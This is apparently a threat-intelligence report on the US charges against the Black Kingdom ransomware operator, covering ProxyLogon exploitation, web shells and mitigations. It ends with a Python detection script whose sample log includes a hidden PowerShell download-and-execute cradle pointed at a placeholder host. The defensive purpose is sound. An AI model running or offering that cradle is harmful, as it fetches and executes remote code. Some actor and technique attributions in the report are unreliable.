# Full Report
The U.S. Department of Justice (DoJ) on Thursday announced charges against a 36-year-old Yemeni national for allegedly deploying the Black Kingdom ransomware against global targets, including businesses, schools, and hospitals in the United States. Rami Khaled Ahmed of Sana'a, Yemen, has been charged with one count of conspiracy, one count of intentional damage to a protected computer, and one
# Analysis Summary
# Threat Actor: Rami Khaled Ahmed / Black Kingdom Ransomware Operator
## Attribution & Identity
* **Attribution:** A 36-year-old Yemeni national named Rami Khaled Ahmed, residing in Sana'a, Yemen.
* **Known Aliases:** Associated with the ransomware strain tracked as **Black Kingdom**. The ransomware family is also tracked under the name **Pydomer**. The actor's activity bears hallmarks of a "motivated script-kiddie."
## Activity Summary
* **Campaign Timeline:** Activity spanning from March 2021 to June 2023.
* **Operations:** Ahmed is charged with deploying the Black Kingdom ransomware against global targets, encrypting victims' data or threatening to steal it, and demanding $10,000 USD in Bitcoin. A co-conspirator handled the cryptocurrency address.
* **Recent Charges:** U.S. Department of Justice (DoJ) announced federal charges against Ahmed for conspiracy, intentional damage to a protected computer, and threatening damage to a protected computer.
* **Related Activity:** Black Kingdom was previously observed exploiting Pulse Secure VPN vulnerabilities (CVE-2019-11510). Later, a Nigerian threat actor was observed attempting to recruit insiders to deploy Black Kingdom for a $1 million reward.
## Tactics, Techniques & Procedures
* **Initial Access:** Exploiting the Microsoft Exchange Server vulnerabilities known as **ProxyLogon** to gain initial access.
* **Post-Exploitation:** Leveraging ProxyLogon exploitation to deploy **web shells**.
* **Execution:** Using web shells to issue **PowerShell commands** to download and execute the ransomware payload.
* **Impact:** Data encryption or data exfiltration/theft, followed by dropping a ransom note instructing payment to a specific Bitcoin address.
* **TTP List:**
    * Exploiting ProxyLogon (UNC2452/HAFNIUM) vulnerabilities.
    * Deploying web shells.
    * Leveraging PowerShell for payload download.
    * Ransomware deployment (Black Kingdom/Pydomer).
    * Extortion via Bitcoin payment demands.
* **MITRE ATT&CK IDs:** Not explicitly provided in the text, but exploitation of the Exchange Server vulnerability aligns with Initial Access techniques (e.g., T1190, T1566.001), and the use of PowerShell aligns with Execution (T1059.001).
## Targeting
* **Sectors:** Businesses, schools, and hospitals. Specific examples include a medical billing services company, a ski resort, a school district, and a health clinic.
* **Geography:** United States (Encino, Oregon, Pennsylvania, Wisconsin) and "elsewhere."
* **Victims:** The ransomware is estimated to have been delivered to approximately 1,500 computer systems globally.
## Tools & Infrastructure
* **Malware Families Used:** Black Kingdom ransomware (also known as Pydomer).
* **Infrastructure:**
    * Black Kingdom email address used for contact post-payment.
    * Cryptocurrency address for receiving $10,000 in Bitcoin.
* **Defanged Information:** None provided in the source text beyond the description of the payment mechanisms above (no specific addresses are given).
## Implications
The prosecution of Rami Khaled Ahmed demonstrates continued international law enforcement focus on holding individual actors behind disruptive ransomware campaigns accountable. The Black Kingdom ransomware itself is described as relatively "rudimentary and amateurish," but its success was derived from aggressively weaponizing zero-day/recently patched critical vulnerabilities like ProxyLogon, indicating a high level of threat against organizations slow to patch high-profile flaws.
## Mitigations
* **Vulnerability Management:** Prioritize patching critical vulnerabilities, specifically Microsoft Exchange Server vulnerabilities (ProxyLogon), immediately upon disclosure or exploitation.
* **Defensive Posture:** Implement robust email gateway protections and endpoint detection capabilities to prevent web shell deployment and PowerShell misuse stemming from initial exploitation chains.
* **Incident Response:** Maintain clear procedures for handling ransomware demands; note that 64% of victim organizations listed in aggregate reporting chose not to pay the ransom.
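The web-shell-to-PowerShell hand-off in the TTP chain above and the endpoint-detection mitigation listed here reduce to one observable: the web server's worker process spawning a command shell that pulls down a payload. The Python below is an added example, not content from the report, that scores constructed process-creation records for that pattern; it assumes `w3wp.exe` is the IIS worker hosting Exchange (general Windows knowledge, not stated in the report) and that telemetry is available as `ParentImage|Image|CommandLine` lines.

```python
# Added example (not from the report): flag IIS-worker -> shell download cradles
# in process-creation telemetry, the hand-off described in the TTP chain above.
# Assumption: Exchange web shells execute under the IIS worker w3wp.exe (general
# Windows knowledge, not stated in the report). All sample data is constructed.
import re

WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Download-and-execute idioms common in one-line PowerShell cradles.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|invoke-expression|\biex\b|-enc(odedcommand)?\b|-nop\b|bypass",
    re.IGNORECASE,
)

def score(parent, image, cmdline):
    """Return (severity, reason) for one process-creation record, else None."""
    from_web = parent.rsplit("\\", 1)[-1].lower() in WEB_WORKERS
    is_shell = image.rsplit("\\", 1)[-1].lower() in SHELLS
    has_cradle = CRADLE.search(cmdline) is not None
    if from_web and is_shell and has_cradle:
        return "high", "IIS worker spawned a shell running a download/execute cradle"
    if from_web and is_shell:
        return "medium", "IIS worker spawned a command shell"
    if is_shell and has_cradle:
        return "low", "download cradle outside the web-server context"
    return None

def scan(log_text):
    """Score each 'ParentImage|Image|CommandLine' line; return (line, sev, why)."""
    hits = []
    for n, raw in enumerate(log_text.strip().splitlines(), 1):
        parent, image, cmdline = raw.split("|", 2)
        verdict = score(parent, image, cmdline)
        if verdict:
            hits.append((n, *verdict))
    return hits

# Constructed sample telemetry; the URL is a placeholder.
SAMPLE_LOG = r"""
C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')
C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|cmd /c whoami
C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-Date
C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost -k netsvcs
"""

if __name__ == "__main__":
    for line_no, severity, reason in scan(SAMPLE_LOG):
        print(f"line {line_no}: {severity.upper()} - {reason}")
```

The same parent/child relationship can be expressed as a Sysmon Event ID 1 or Security 4688 rule in an EDR or SIEM; the heuristic will also fire on legitimate administrative shells spawned by IIS, so tune on a baseline before alerting.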